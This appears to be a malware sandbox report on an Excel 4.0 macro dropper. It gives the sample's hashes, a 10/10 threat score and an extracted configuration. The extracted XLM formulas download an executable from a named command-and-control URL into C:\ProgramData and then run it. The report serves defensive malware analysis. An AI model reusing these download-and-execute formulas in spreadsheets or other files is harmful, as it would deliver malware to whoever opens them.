General

  • Target

    c10db36f5a07bd13703226344b43cc1c_JaffaCakes118

  • Size

    106KB

  • Sample

    240825-s4dtns1gng

  • MD5

    c10db36f5a07bd13703226344b43cc1c

  • SHA1

    e67cf3ac54881bb4791e903426c3161e50249339

  • SHA256

    c0381b65a09796156de7dfc69e48cd0d16d67a27ced3fd15bc0c86c8d0f97b75

  • SHA512

    c87b70bafa17afddc7cd57c203ef0f93b65223d091507ce509601cb786af19d4475750f65f25bdd0829ed5f86bd0895c13fefd24a89eda13c075ffcf308a7e1f

  • SSDEEP

    1536:nSyEBMOZoVhoy9kKpA6gLc1aeWLXri6m7wBGozFDCTIuYDFo6QzXGfOiLdvkQJY:NOcoy2KpMXrit74lzFOTIT9QGfOiu

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://toliku.com/qmzo.exe

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://toliku.com/qmzo.exe","C:\ProgramData\cswzqQf.exe",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\cswzqQf.exe",,0,0)
    =HALT()

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://toliku.com/qmzo.exe

